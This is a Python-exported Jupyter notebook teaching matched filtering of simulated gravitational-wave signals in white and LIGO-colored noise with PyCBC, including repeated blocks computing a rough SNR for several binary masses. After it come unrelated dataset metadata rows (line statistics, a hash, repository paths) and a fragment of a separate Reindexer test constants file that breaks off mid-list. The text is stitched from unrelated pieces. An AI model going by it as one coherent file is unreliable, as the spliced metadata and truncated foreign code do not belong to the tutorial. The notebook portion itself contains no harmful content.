# -- Use the following for Google Colab
#! pip install -q 'lalsuite==6.66' 'PyCBC==1.15.3'
# **Important:** With Google Colab, you may need to restart the runtime after running the cell above.
# ### Matched-filtering: Finding well modelled signals in Gaussian noise
#
# Matched filtering can be shown to be the optimal method for "detecting" signals---when the signal waveform is known---in Gaussian noise. We'll explore those assumptions a little later, but for now let's demonstrate how this works.
#
# Let's assume you have a stretch of noise, white noise to start:
# In[162]:
get_ipython().run_line_magic('matplotlib', 'inline')
import numpy
import pylab
# specify the sample rate.
# LIGO raw data is sampled at 16384 Hz (=2^14 samples/second).
# It captures signal frequency content up to f_Nyquist = 8192 Hz.
# Here, we will make the computation faster by sampling at a lower rate.
sample_rate = 1024 # samples per second
data_length = 1024 # seconds
# Generate a long stretch of white noise: the data series and the time series.
data = numpy.random.normal(size=[sample_rate * data_length])
times = numpy.arange(len(data)) / float(sample_rate)
# And then let's add a gravitational wave signal to some random part of this data.
# In[163]:
from pycbc.waveform import get_td_waveform
# the "approximant" (jargon for parameterized waveform family).
# IMRPhenomD is defined in the frequency domain, but we'll get it in the time domain (td).
# It runs fast, but it doesn't include effects such as non-aligned component spin, or higher order modes.
apx = 'IMRPhenomD'
# You can specify many parameters,
# https://pycbc.org/pycbc/latest/html/pycbc.waveform.html?highlight=get_td_waveform#pycbc.waveform.waveform.get_td_waveform
# but here, we'll use defaults for everything except the masses.
# It returns both hplus and hcross, but we'll only use hplus for now.
hp1, _ = get_td_waveform(approximant=apx,
mass1=10,
mass2=10,
delta_t=1.0/sample_rate,
f_lower=25)
# The amplitude of gravitational-wave signals is normally of order 1E-20. To demonstrate our method
# on white noise with amplitude O(1) we normalize our signal so the cross-correlation of the signal with
# itself will give a value of 1. In this case we can interpret the cross-correlation of the signal with white
# noise as a signal-to-noise ratio.
hp1 = hp1 / max(numpy.correlate(hp1,hp1, mode='full'))**0.5
# note that in this figure, the waveform amplitude is of order 1.
# The duration (for frequency above f_lower=25 Hz) is only 3 or 4 seconds long.
# The waveform is "tapered": slowly ramped up from zero to full strength, over the first second or so.
# It is zero-padded at earlier times.
pylab.figure()
pylab.title("The waveform hp1")
pylab.plot(hp1.sample_times, hp1)
pylab.xlabel('Time (s)')
pylab.ylabel('Normalized amplitude')
# Shift the waveform to start at a random time in the Gaussian noise data.
waveform_start = numpy.random.randint(0, len(data) - len(hp1))
data[waveform_start:waveform_start+len(hp1)] += 10 * hp1.numpy()
pylab.figure()
pylab.title("Looks like random noise, right?")
pylab.plot(hp1.sample_times, data[waveform_start:waveform_start+len(hp1)])
pylab.xlabel('Time (s)')
pylab.ylabel('Normalized amplitude')
pylab.figure()
pylab.title("Signal in the data")
pylab.plot(hp1.sample_times, data[waveform_start:waveform_start+len(hp1)])
pylab.plot(hp1.sample_times, 10 * hp1)
pylab.xlabel('Time (s)')
pylab.ylabel('Normalized amplitude')
# To search for this signal we can cross-correlate the signal with the entire dataset -> Not in any way optimized at this point, just showing the method.
#
# We will do the cross-correlation in the time domain, once for each time step. It runs slowly...
# In[164]:
cross_correlation = numpy.zeros([len(data)-len(hp1)])
hp1_numpy = hp1.numpy()
for i in range(len(data) - len(hp1_numpy)):
cross_correlation[i] = (hp1_numpy * data[i:i+len(hp1_numpy)]).sum()
# plot the cross-correlated data vs time. Superimpose the location of the end of the signal;
# this is where we should find a peak in the cross-correlation.
pylab.figure()
times = numpy.arange(len(data) - len(hp1_numpy)) / float(sample_rate)
pylab.plot(times, cross_correlation)
pylab.plot([waveform_start/float(sample_rate), waveform_start/float(sample_rate)], [-10,10],'r:')
pylab.xlabel('Time (s)')
pylab.ylabel('Cross-correlation')
# Here you can see that the largest spike from the cross-correlation comes at the time of the signal. We only really need one more ingredient to describe matched-filtering: "Colored" noise (Gaussian noise but with a frequency-dependent variance; white noise has frequency-independent variance).
#
# Let's repeat the process, but generate a stretch of data colored with LIGO's zero-detuned--high-power noise curve. We'll use a PyCBC library to do this.
# In[165]:
# http://pycbc.org/pycbc/latest/html/noise.html
import pycbc.noise
import pycbc.psd
# The color of the noise matches a PSD which you provide:
# Generate a PSD matching Advanced LIGO's zero-detuned--high-power noise curve
flow = 10.0
delta_f = 1.0 / 128
flen = int(sample_rate / (2 * delta_f)) + 1
psd = pycbc.psd.aLIGOZeroDetHighPower(flen, delta_f, flow)
# Generate colored noise
delta_t = 1.0 / sample_rate
ts = pycbc.noise.noise_from_psd(data_length*sample_rate, delta_t, psd, seed=127)
# Estimate the amplitude spectral density (ASD = sqrt(PSD)) for the noisy data
# using the "welch" method. We'll choose 4 seconds PSD samples that are overlapped 50%
seg_len = int(4 / delta_t)
seg_stride = int(seg_len / 2)
estimated_psd = pycbc.psd.welch(ts,seg_len=seg_len,seg_stride=seg_stride)
# plot it:
pylab.loglog(estimated_psd.sample_frequencies, estimated_psd, label='estimate')
pylab.loglog(psd.sample_frequencies, psd, linewidth=3, label='known psd')
pylab.xlim(xmin=flow, xmax=512)
pylab.ylim(1e-47, 1e-45)
pylab.legend()
pylab.grid()
pylab.show()
# add the signal, this time, with a "typical" amplitude.
ts[waveform_start:waveform_start+len(hp1)] += hp1.numpy() * 1E-20
# Then all we need to do is to "whiten" both the data, and the template waveform. This can be done, in the frequency domain, by dividing by the PSD. This *can* be done in the time domain as well, but it's more intuitive in the frequency domain
# In[166]:
# Generate a PSD for whitening the data
from pycbc.types import TimeSeries
# The PSD, sampled properly for the noisy data
flow = 10.0
delta_f = 1.0 / data_length
flen = int(sample_rate / (2 * delta_f)) + 1
psd_td = pycbc.psd.aLIGOZeroDetHighPower(flen, delta_f, 0)
# The PSD, sampled properly for the signal
delta_f = sample_rate / float(len(hp1))
flen = int(sample_rate / (2 * delta_f)) + 1
psd_hp1 = pycbc.psd.aLIGOZeroDetHighPower(flen, delta_f, 0)
# The 0th and Nth values are zero. Set them to a nearby value to avoid dividing by zero.
psd_td[0] = psd_td[1]
psd_td[len(psd_td) - 1] = psd_td[len(psd_td) - 2]
# Same, for the PSD sampled for the signal
psd_hp1[0] = psd_hp1[1]
psd_hp1[len(psd_hp1) - 1] = psd_hp1[len(psd_hp1) - 2]
# convert both noisy data and the signal to frequency domain,
# and divide each by ASD=PSD**0.5, then convert back to time domain.
# This "whitens" the data and the signal template.
# Multiplying the signal template by 1E-21 puts it into realistic units of strain.
data_whitened = (ts.to_frequencyseries() / psd_td**0.5).to_timeseries()
hp1_whitened = (hp1.to_frequencyseries() / psd_hp1**0.5).to_timeseries() * 1E-21
# In[167]:
# Now let's re-do the correlation, in the time domain, but with whitened data and template.
cross_correlation = numpy.zeros([len(data)-len(hp1)])
hp1n = hp1_whitened.numpy()
datan = data_whitened.numpy()
for i in range(len(datan) - len(hp1n)):
cross_correlation[i] = (hp1n * datan[i:i+len(hp1n)]).sum()
# plot the cross-correlation in the time domain. Superimpose the location of the end of the signal.
# Note how much bigger the cross-correlation peak is, relative to the noise level,
# compared with the unwhitened version of the same quantity. SNR is much higher!
pylab.figure()
times = numpy.arange(len(datan) - len(hp1n)) / float(sample_rate)
pylab.plot(times, cross_correlation)
pylab.plot([waveform_start/float(sample_rate), waveform_start/float(sample_rate)],
[(min(cross_correlation))*1.1,(max(cross_correlation))*1.1],'r:')
pylab.xlabel('Time (s)')
pylab.ylabel('Cross-correlation')
# # Challenge!
#
# * Histogram the whitened time series. Ignoring the outliers associated with the signal, is it a Gaussian? What is the mean and standard deviation? (We have not been careful in normalizing the whitened data properly).
# * Histogram the above cross-correlation time series. Ignoring the outliers associated with the signal, is it a Gaussian? What is the mean and standard deviation?
# * Find the location of the peak. (Note that here, it can be positive or negative), and the value of the SNR of the signal (which is the absolute value of the peak value, divided by the standard deviation of the cross-correlation time series).
#
# ## Optional challenge question. much harder:
# * Repeat this process, but instead of using a waveform with mass1=mass2=10, try 15, 20, or 25. Plot the SNR vs mass. Careful! Using lower masses (eg, mass1=mass2=1.4 Msun) will not work here. Why?
# In[168]:
import matplotlib.pyplot as plt
import numpy as np
import matplotlib.mlab as mlab
from scipy.stats import norm
fig, ax = plt.subplots(figsize =(10, 7))
n,bins,patches = ax.hist(data_whitened, bins = 75, density=1, range=[-100,100],color='orange')
mean = np.mean(data_whitened)
print('mean',mean)
std = np.std(data_whitened)
print('std',std)
median = np.median(data_whitened)
print('median',median)
fit=norm.pdf(bins,mean,std)
ax.plot(bins,fit,'--',color='r', linewidth=3.0)
#ax.set_title(r'$\sigma$ = {} and mean = {}' .format(std, mean))
ax.set_title(r'std.dev = $\sigma$ = {0:.3f}' .format(std),loc='left')
ax.set_title(r'mean = $\mu$ = {0:1.3e}' .format(mean),loc='right')
ax.set_title(r'median = {0:1.3f}' .format(median),loc='center')
ax.set_ylabel('Whitened Data',fontsize=15)
plt.show()
#0:1.2f
# ###### Yes the histogram plot of the whitened data is Gaussian
# In[169]:
import matplotlib.pyplot as plt
import numpy as np
import matplotlib.mlab as mlab
from scipy.stats import norm
fig, ax = plt.subplots(figsize =(10, 7))
n,bins,patches = ax.hist(cross_correlation, bins = 275, density=1, range=[-15000,15000],color='orange')
mean = np.mean(cross_correlation)
print('mean',mean)
std = np.std(cross_correlation)
print('std',std)
median = np.median(cross_correlation)
print('median',median)
fit=norm.pdf(bins,mean,std)
ax.plot(bins,fit,'--',color='r', linewidth=3.0)
#ax.set_title(r'$\sigma$ = {} and mean = {}' .format(std, mean))
ax.set_title(r'std.dev = $\sigma$ = {0:.3f}' .format(std),loc='left')
ax.set_title(r'mean = $\mu$ = {0:1.3e}' .format(mean),loc='right')
ax.set_title(r'median = {0:1.3f}' .format(median),loc='center')
ax.set_ylabel('Cross Correlation',fontsize=15)
plt.show()
n_max=n.max()
print(n.max())
bin_nmax = np.argmax(n)
SNR_10=n_max/std
print('The SNR_10 value is',SNR_10)
#print(bin_nmax)
# ### For mass1=mass2=15
# In[170]:
import numpy
import pylab
sample_rate = 1024 # samples per second
data_length = 1024 # seconds
# Generate a long stretch of white noise: the data series and the time series.
data = numpy.random.normal(size=[sample_rate * data_length])
times = numpy.arange(len(data)) / float(sample_rate)
from pycbc.waveform import get_td_waveform
apx = 'IMRPhenomD'
hp1, _ = get_td_waveform(approximant=apx,
mass1=15,
mass2=15,
delta_t=1.0/sample_rate,
f_lower=25)
hp1 = hp1 / max(numpy.correlate(hp1,hp1, mode='full'))**0.5
# Shift the waveform to start at a random time in the Gaussian noise data.
waveform_start = numpy.random.randint(0, len(data) - len(hp1))
data[waveform_start:waveform_start+len(hp1)] += 10 * hp1.numpy()
cross_correlation = numpy.zeros([len(data)-len(hp1)])
hp1_numpy = hp1.numpy()
for i in range(len(data) - len(hp1_numpy)):
cross_correlation[i] = (hp1_numpy * data[i:i+len(hp1_numpy)]).sum()
import pycbc.noise
import pycbc.psd
# The color of the noise matches a PSD which you provide:
# Generate a PSD matching Advanced LIGO's zero-detuned--high-power noise curve
flow = 10.0
delta_f = 1.0 / 128
flen = int(sample_rate / (2 * delta_f)) + 1
psd = pycbc.psd.aLIGOZeroDetHighPower(flen, delta_f, flow)
# Generate colored noise
delta_t = 1.0 / sample_rate
ts = pycbc.noise.noise_from_psd(data_length*sample_rate, delta_t, psd, seed=127)
# Estimate the amplitude spectral density (ASD = sqrt(PSD)) for the noisy data
# using the "welch" method. We'll choose 4 seconds PSD samples that are overlapped 50%
seg_len = int(4 / delta_t)
seg_stride = int(seg_len / 2)
estimated_psd = pycbc.psd.welch(ts,seg_len=seg_len,seg_stride=seg_stride)
# add the signal, this time, with a "typical" amplitude.
ts[waveform_start:waveform_start+len(hp1)] += hp1.numpy() * 1E-20
# Generate a PSD for whitening the data
from pycbc.types import TimeSeries
# The PSD, sampled properly for the noisy data
flow = 10.0
delta_f = 1.0 / data_length
flen = int(sample_rate / (2 * delta_f)) + 1
psd_td = pycbc.psd.aLIGOZeroDetHighPower(flen, delta_f, 0)
# The PSD, sampled properly for the signal
delta_f = sample_rate / float(len(hp1))
flen = int(sample_rate / (2 * delta_f)) + 1
psd_hp1 = pycbc.psd.aLIGOZeroDetHighPower(flen, delta_f, 0)
# The 0th and Nth values are zero. Set them to a nearby value to avoid dividing by zero.
psd_td[0] = psd_td[1]
psd_td[len(psd_td) - 1] = psd_td[len(psd_td) - 2]
# Same, for the PSD sampled for the signal
psd_hp1[0] = psd_hp1[1]
psd_hp1[len(psd_hp1) - 1] = psd_hp1[len(psd_hp1) - 2]
# convert both noisy data and the signal to frequency domain,
# and divide each by ASD=PSD**0.5, then convert back to time domain.
# This "whitens" the data and the signal template.
# Multiplying the signal template by 1E-21 puts it into realistic units of strain.
data_whitened = (ts.to_frequencyseries() / psd_td**0.5).to_timeseries()
hp1_whitened = (hp1.to_frequencyseries() / psd_hp1**0.5).to_timeseries() * 1E-21
cross_correlation = numpy.zeros([len(data)-len(hp1)])
hp1n = hp1_whitened.numpy()
datan = data_whitened.numpy()
for i in range(len(datan) - len(hp1n)):
cross_correlation[i] = (hp1n * datan[i:i+len(hp1n)]).sum()
# plot the cross-correlation in the time domain. Superimpose the location of the end of the signal.
# Note how much bigger the cross-correlation peak is, relative to the noise level,
# compared with the unwhitened version of the same quantity. SNR is much higher!
pylab.figure()
times = numpy.arange(len(datan) - len(hp1n)) / float(sample_rate)
pylab.plot(times, cross_correlation)
pylab.plot([waveform_start/float(sample_rate), waveform_start/float(sample_rate)],
[(min(cross_correlation))*1.1,(max(cross_correlation))*1.1],'r:')
pylab.xlabel('Time (s)')
pylab.ylabel('Cross-correlation')
# In[171]:
import matplotlib.pyplot as plt
import numpy as np
import matplotlib.mlab as mlab
from scipy.stats import norm
fig, ax = plt.subplots(figsize =(10, 7))
n,bins,patches = ax.hist(data_whitened, bins = 75, density=1, range=[-100,100],color='orange')
mean = np.mean(data_whitened)
print('mean',mean)
std = np.std(data_whitened)
print('std',std)
median = np.median(data_whitened)
print('median',median)
fit=norm.pdf(bins,mean,std)
ax.plot(bins,fit,'--',color='r', linewidth=3.0)
#ax.set_title(r'$\sigma$ = {} and mean = {}' .format(std, mean))
ax.set_title(r'std.dev = $\sigma$ = {0:.3f}' .format(std),loc='left')
ax.set_title(r'mean = $\mu$ = {0:1.3e}' .format(mean),loc='right')
ax.set_title(r'median = {0:1.3f}' .format(median),loc='center')
ax.set_ylabel('Whitened Data',fontsize=15)
plt.show()
# In[172]:
import matplotlib.pyplot as plt
import numpy as np
import matplotlib.mlab as mlab
from scipy.stats import norm
fig, ax = plt.subplots(figsize =(10, 7))
n,bins,patches = ax.hist(cross_correlation, bins = 275, density=1, range=[-15000,15000],color='orange')
mean = np.mean(cross_correlation)
print('mean',mean)
std = np.std(cross_correlation)
print('std',std)
median = np.median(cross_correlation)
print('median',median)
fit=norm.pdf(bins,mean,std)
ax.plot(bins,fit,'--',color='r', linewidth=3.0)
#ax.set_title(r'$\sigma$ = {} and mean = {}' .format(std, mean))
ax.set_title(r'std.dev = $\sigma$ = {0:.3f}' .format(std),loc='left')
ax.set_title(r'mean = $\mu$ = {0:1.3e}' .format(mean),loc='right')
ax.set_title(r'median = {0:1.3f}' .format(median),loc='center')
ax.set_ylabel('Cross Correlation',fontsize=15)
plt.show()
n_max=n.max()
print(n.max())
bin_nmax = np.argmax(n)
SNR_15=n_max/std
print('The SNR_15 value is',SNR_15)
#print(bin_nmax)
# ### For mass1=mass2=20
# In[173]:
import numpy
import pylab
sample_rate = 1024 # samples per second
data_length = 1024 # seconds
# Generate a long stretch of white noise: the data series and the time series.
data = numpy.random.normal(size=[sample_rate * data_length])
times = numpy.arange(len(data)) / float(sample_rate)
from pycbc.waveform import get_td_waveform
apx = 'IMRPhenomD'
hp1, _ = get_td_waveform(approximant=apx,
mass1=20,
mass2=20,
delta_t=1.0/sample_rate,
f_lower=25)
hp1 = hp1 / max(numpy.correlate(hp1,hp1, mode='full'))**0.5
# Shift the waveform to start at a random time in the Gaussian noise data.
waveform_start = numpy.random.randint(0, len(data) - len(hp1))
data[waveform_start:waveform_start+len(hp1)] += 10 * hp1.numpy()
cross_correlation = numpy.zeros([len(data)-len(hp1)])
hp1_numpy = hp1.numpy()
for i in range(len(data) - len(hp1_numpy)):
cross_correlation[i] = (hp1_numpy * data[i:i+len(hp1_numpy)]).sum()
import pycbc.noise
import pycbc.psd
# The color of the noise matches a PSD which you provide:
# Generate a PSD matching Advanced LIGO's zero-detuned--high-power noise curve
flow = 10.0
delta_f = 1.0 / 128
flen = int(sample_rate / (2 * delta_f)) + 1
psd = pycbc.psd.aLIGOZeroDetHighPower(flen, delta_f, flow)
# Generate colored noise
delta_t = 1.0 / sample_rate
ts = pycbc.noise.noise_from_psd(data_length*sample_rate, delta_t, psd, seed=127)
# Estimate the amplitude spectral density (ASD = sqrt(PSD)) for the noisy data
# using the "welch" method. We'll choose 4 seconds PSD samples that are overlapped 50%
seg_len = int(4 / delta_t)
seg_stride = int(seg_len / 2)
estimated_psd = pycbc.psd.welch(ts,seg_len=seg_len,seg_stride=seg_stride)
# add the signal, this time, with a "typical" amplitude.
ts[waveform_start:waveform_start+len(hp1)] += hp1.numpy() * 1E-20
# Generate a PSD for whitening the data
from pycbc.types import TimeSeries
# The PSD, sampled properly for the noisy data
flow = 10.0
delta_f = 1.0 / data_length
flen = int(sample_rate / (2 * delta_f)) + 1
psd_td = pycbc.psd.aLIGOZeroDetHighPower(flen, delta_f, 0)
# The PSD, sampled properly for the signal
delta_f = sample_rate / float(len(hp1))
flen = int(sample_rate / (2 * delta_f)) + 1
psd_hp1 = pycbc.psd.aLIGOZeroDetHighPower(flen, delta_f, 0)
# The 0th and Nth values are zero. Set them to a nearby value to avoid dividing by zero.
psd_td[0] = psd_td[1]
psd_td[len(psd_td) - 1] = psd_td[len(psd_td) - 2]
# Same, for the PSD sampled for the signal
psd_hp1[0] = psd_hp1[1]
psd_hp1[len(psd_hp1) - 1] = psd_hp1[len(psd_hp1) - 2]
# convert both noisy data and the signal to frequency domain,
# and divide each by ASD=PSD**0.5, then convert back to time domain.
# This "whitens" the data and the signal template.
# Multiplying the signal template by 1E-21 puts it into realistic units of strain.
data_whitened = (ts.to_frequencyseries() / psd_td**0.5).to_timeseries()
hp1_whitened = (hp1.to_frequencyseries() / psd_hp1**0.5).to_timeseries() * 1E-21
cross_correlation = numpy.zeros([len(data)-len(hp1)])
hp1n = hp1_whitened.numpy()
datan = data_whitened.numpy()
for i in range(len(datan) - len(hp1n)):
cross_correlation[i] = (hp1n * datan[i:i+len(hp1n)]).sum()
# plot the cross-correlation in the time domain. Superimpose the location of the end of the signal.
# Note how much bigger the cross-correlation peak is, relative to the noise level,
# compared with the unwhitened version of the same quantity. SNR is much higher!
pylab.figure()
times = numpy.arange(len(datan) - len(hp1n)) / float(sample_rate)
pylab.plot(times, cross_correlation)
pylab.plot([waveform_start/float(sample_rate), waveform_start/float(sample_rate)],
[(min(cross_correlation))*1.1,(max(cross_correlation))*1.1],'r:')
pylab.xlabel('Time (s)')
pylab.ylabel('Cross-correlation')
# In[174]:
import matplotlib.pyplot as plt
import numpy as np
import matplotlib.mlab as mlab
from scipy.stats import norm
fig, ax = plt.subplots(figsize =(10, 7))
n,bins,patches = ax.hist(data_whitened, bins = 75, density=1, range=[-100,100],color='orange')
mean = np.mean(data_whitened)
print('mean',mean)
std = np.std(data_whitened)
print('std',std)
median = np.median(data_whitened)
print('median',median)
fit=norm.pdf(bins,mean,std)
ax.plot(bins,fit,'--',color='r', linewidth=3.0)
#ax.set_title(r'$\sigma$ = {} and mean = {}' .format(std, mean))
ax.set_title(r'std.dev = $\sigma$ = {0:.3f}' .format(std),loc='left')
ax.set_title(r'mean = $\mu$ = {0:1.3e}' .format(mean),loc='right')
ax.set_title(r'median = {0:1.3f}' .format(median),loc='center')
ax.set_ylabel('Whitened Data',fontsize=15)
plt.show()
# In[175]:
import matplotlib.pyplot as plt
import numpy as np
import matplotlib.mlab as mlab
from scipy.stats import norm
fig, ax = plt.subplots(figsize =(10, 7))
n,bins,patches = ax.hist(cross_correlation, bins = 275, density=1, range=[-15000,15000],color='orange')
mean = np.mean(cross_correlation)
print('mean',mean)
std = np.std(cross_correlation)
print('std',std)
median = np.median(cross_correlation)
print('median',median)
fit=norm.pdf(bins,mean,std)
ax.plot(bins,fit,'--',color='r', linewidth=3.0)
#ax.set_title(r'$\sigma$ = {} and mean = {}' .format(std, mean))
ax.set_title(r'std.dev = $\sigma$ = {0:.3f}' .format(std),loc='left')
ax.set_title(r'mean = $\mu$ = {0:1.3e}' .format(mean),loc='right')
ax.set_title(r'median = {0:1.3f}' .format(median),loc='center')
ax.set_ylabel('Cross Correlation',fontsize=15)
plt.show()
n_max=n.max()
print(n.max())
bin_nmax = np.argmax(n)
SNR_20=n_max/std
print('The SNR_20 value is',SNR_20)
#print(bin_nmax)
# ### For mass1=mass2=25
# In[176]:
import numpy
import pylab
sample_rate = 1024 # samples per second
data_length = 1024 # seconds
# Generate a long stretch of white noise: the data series and the time series.
data = numpy.random.normal(size=[sample_rate * data_length])
times = numpy.arange(len(data)) / float(sample_rate)
from pycbc.waveform import get_td_waveform
apx = 'IMRPhenomD'
hp1, _ = get_td_waveform(approximant=apx,
mass1=25,
mass2=25,
delta_t=1.0/sample_rate,
f_lower=25)
hp1 = hp1 / max(numpy.correlate(hp1,hp1, mode='full'))**0.5
# Shift the waveform to start at a random time in the Gaussian noise data.
waveform_start = numpy.random.randint(0, len(data) - len(hp1))
data[waveform_start:waveform_start+len(hp1)] += 10 * hp1.numpy()
cross_correlation = numpy.zeros([len(data)-len(hp1)])
hp1_numpy = hp1.numpy()
for i in range(len(data) - len(hp1_numpy)):
cross_correlation[i] = (hp1_numpy * data[i:i+len(hp1_numpy)]).sum()
import pycbc.noise
import pycbc.psd
# The color of the noise matches a PSD which you provide:
# Generate a PSD matching Advanced LIGO's zero-detuned--high-power noise curve
flow = 10.0
delta_f = 1.0 / 128
flen = int(sample_rate / (2 * delta_f)) + 1
psd = pycbc.psd.aLIGOZeroDetHighPower(flen, delta_f, flow)
# Generate colored noise
delta_t = 1.0 / sample_rate
ts = pycbc.noise.noise_from_psd(data_length*sample_rate, delta_t, psd, seed=127)
# Estimate the amplitude spectral density (ASD = sqrt(PSD)) for the noisy data
# using the "welch" method. We'll choose 4 seconds PSD samples that are overlapped 50%
seg_len = int(4 / delta_t)
seg_stride = int(seg_len / 2)
estimated_psd = pycbc.psd.welch(ts,seg_len=seg_len,seg_stride=seg_stride)
# add the signal, this time, with a "typical" amplitude.
ts[waveform_start:waveform_start+len(hp1)] += hp1.numpy() * 1E-20
# Generate a PSD for whitening the data
from pycbc.types import TimeSeries
# The PSD, sampled properly for the noisy data
flow = 10.0
delta_f = 1.0 / data_length
flen = int(sample_rate / (2 * delta_f)) + 1
psd_td = pycbc.psd.aLIGOZeroDetHighPower(flen, delta_f, 0)
# The PSD, sampled properly for the signal
delta_f = sample_rate / float(len(hp1))
flen = int(sample_rate / (2 * delta_f)) + 1
psd_hp1 = pycbc.psd.aLIGOZeroDetHighPower(flen, delta_f, 0)
# The 0th and Nth values are zero. Set them to a nearby value to avoid dividing by zero.
psd_td[0] = psd_td[1]
psd_td[len(psd_td) - 1] = psd_td[len(psd_td) - 2]
# Same, for the PSD sampled for the signal
psd_hp1[0] = psd_hp1[1]
psd_hp1[len(psd_hp1) - 1] = psd_hp1[len(psd_hp1) - 2]
# convert both noisy data and the signal to frequency domain,
# and divide each by ASD=PSD**0.5, then convert back to time domain.
# This "whitens" the data and the signal template.
# Multiplying the signal template by 1E-21 puts it into realistic units of strain.
data_whitened = (ts.to_frequencyseries() / psd_td**0.5).to_timeseries()
hp1_whitened = (hp1.to_frequencyseries() / psd_hp1**0.5).to_timeseries() * 1E-21
cross_correlation = numpy.zeros([len(data)-len(hp1)])
hp1n = hp1_whitened.numpy()
datan = data_whitened.numpy()
for i in range(len(datan) - len(hp1n)):
cross_correlation[i] = (hp1n * datan[i:i+len(hp1n)]).sum()
# plot the cross-correlation in the time domain. Superimpose the location of the end of the signal.
# Note how much bigger the cross-correlation peak is, relative to the noise level,
# compared with the unwhitened version of the same quantity. SNR is much higher!
pylab.figure()
times = numpy.arange(len(datan) - len(hp1n)) / float(sample_rate)
pylab.plot(times, cross_correlation)
pylab.plot([waveform_start/float(sample_rate), waveform_start/float(sample_rate)],
[(min(cross_correlation))*1.1,(max(cross_correlation))*1.1],'r:')
pylab.xlabel('Time (s)')
pylab.ylabel('Cross-correlation')
# In[177]:
import matplotlib.pyplot as plt
import numpy as np
import matplotlib.mlab as mlab
from scipy.stats import norm
fig, ax = plt.subplots(figsize =(10, 7))
n,bins,patches = ax.hist(data_whitened, bins = 75, density=1, range=[-100,100],color='orange')
mean = np.mean(data_whitened)
print('mean',mean)
std = np.std(data_whitened)
print('std',std)
median = np.median(data_whitened)
print('median',median)
fit=norm.pdf(bins,mean,std)
ax.plot(bins,fit,'--',color='r', linewidth=3.0)
#ax.set_title(r'$\sigma$ = {} and mean = {}' .format(std, mean))
ax.set_title(r'std.dev = $\sigma$ = {0:.3f}' .format(std),loc='left')
ax.set_title(r'mean = $\mu$ = {0:1.3e}' .format(mean),loc='right')
ax.set_title(r'median = {0:1.3f}' .format(median),loc='center')
ax.set_ylabel('Whitened Data',fontsize=15)
plt.show()
# In[178]:
import matplotlib.pyplot as plt
import numpy as np
import matplotlib.mlab as mlab
from scipy.stats import norm
fig, ax = plt.subplots(figsize =(10, 7))
n,bins,patches = ax.hist(cross_correlation, bins = 275, density=1, range=[-15000,15000],color='orange')
mean = np.mean(cross_correlation)
print('mean',mean)
std = np.std(cross_correlation)
print('std',std)
median = np.median(cross_correlation)
print('median',median)
fit=norm.pdf(bins,mean,std)
ax.plot(bins,fit,'--',color='r', linewidth=3.0)
#ax.set_title(r'$\sigma$ = {} and mean = {}' .format(std, mean))
ax.set_title(r'std.dev = $\sigma$ = {0:.3f}' .format(std),loc='left')
ax.set_title(r'mean = $\mu$ = {0:1.3e}' .format(mean),loc='right')
ax.set_title(r'median = {0:1.3f}' .format(median),loc='center')
ax.set_ylabel('Cross Correlation',fontsize=15)
plt.show()
n_max=n.max()
print(n.max())
bin_nmax = np.argmax(n)
SNR_25=n_max/std
print('The SNR_25 value is',SNR_25)
#print(bin_nmax)
# In[184]:
SNR=[SNR_10,SNR_15,SNR_20,SNR_25]
Mass=[10,15,20,25]
fig, ax = plt.subplots(figsize =(10, 7))
ax.plot(Mass,SNR,'--',color='r', linewidth=3.0)
#ax.set_title(r'$\sigma$ = {} and mean = {}' .format(std, mean))
ax.set_xlabel('Mass',fontsize=15)
ax.set_ylabel('SNR',fontsize=15)
#ax.set_yscale('log')
#ax.set_xscale('log')
plt.show()
# ### Optimizing a matched-filter
#
# That's all that a matched-filter is. A cross-correlation of the data with a template waveform performed as a function of time. This cross-correlation walking through the data is a convolution operation. Convolution operations are more optimally performed in the frequency domain, which becomes a `O(N ln N)` operation, as opposed to the `O(N^2)` operation shown here. You can also conveniently vary the phase of the signal in the frequency domain, as we will illustrate in the next tutorial. PyCBC implements a frequency-domain matched-filtering engine, which is much faster than the code we've shown here. Let's move to the next tutorial now, where we will demonstrate its use on real data.
| 38.097411
| 693
| 0.721623
| 5,171
| 30,897
| 4.216206
| 0.108683
| 0.052839
| 0.015136
| 0.01665
| 0.759472
| 0.756536
| 0.741033
| 0.731905
| 0.7303
| 0.718833
| 0
| 0.033906
| 0.144707
| 30,897
| 810
| 694
| 38.144444
| 0.791115
| 0.409263
| 0
| 0.918367
| 0
| 0
| 0.078724
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.126984
| 0
| 0.126984
| 0.072562
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
ef06020431d9ef3f383386d4e65ca1160acfcec4
| 1,230
|
py
|
Python
|
pyreindexer/tests/test_data/constants.py
|
Restream/reindexer-py
|
9a5925f167ac676f07ba39e32985cc6f6a0abebf
|
[
"Apache-2.0"
] | 2
|
2020-08-07T16:44:33.000Z
|
2020-08-07T20:57:18.000Z
|
pyreindexer/tests/test_data/constants.py
|
Restream/reindexer-py
|
9a5925f167ac676f07ba39e32985cc6f6a0abebf
|
[
"Apache-2.0"
] | null | null | null |
pyreindexer/tests/test_data/constants.py
|
Restream/reindexer-py
|
9a5925f167ac676f07ba39e32985cc6f6a0abebf
|
[
"Apache-2.0"
] | 3
|
2020-08-07T20:57:24.000Z
|
2021-09-07T14:52:14.000Z
|
index_definition = {
"name": "id",
"field_type": "int",
"index_type": "hash",
"is_pk": True,
"is_array": False,
"is_dense": False,
"is_sparse": False,
"collate_mode": "none",
"sort_order_letters": "",
"expire_after": 0,
"config": {
},
"json_paths": [
"id"
]
}
updated_index_definition = {
"name": "id",
"field_type": "int64",
"index_type": "hash",
"is_pk": True,
"is_array": False,
"is_dense": False,
"is_sparse": False,
"collate_mode": "none",
"sort_order_letters": "",
"expire_after": 0,
"config": {
},
"json_paths": [
"id_new"
]
}
special_namespaces = [{"name": "#namespaces"},
{"name": "#memstats"},
{"name": "#perfstats"},
{"name": "#config"},
{"name": "#queriesperfstats"},
{"name": "#activitystats"},
{"name": "#clientsstats"}]
special_namespaces_cluster = [{"name": "#namespaces"},
{"name": "#memstats"},
{"name": "#perfstats"},
{"name": "#config"},
{"name": "#queriesperfstats"},
{"name": "#activitystats"},
{"name": "#clientsstats"},
{"name": "#replicationstats"}]
item_definition = {'id': 100, 'val': "testval"}
| 21.206897
| 54
| 0.518699
| 113
| 1,230
| 5.380531
| 0.380531
| 0.046053
| 0.0625
| 0.069079
| 0.822368
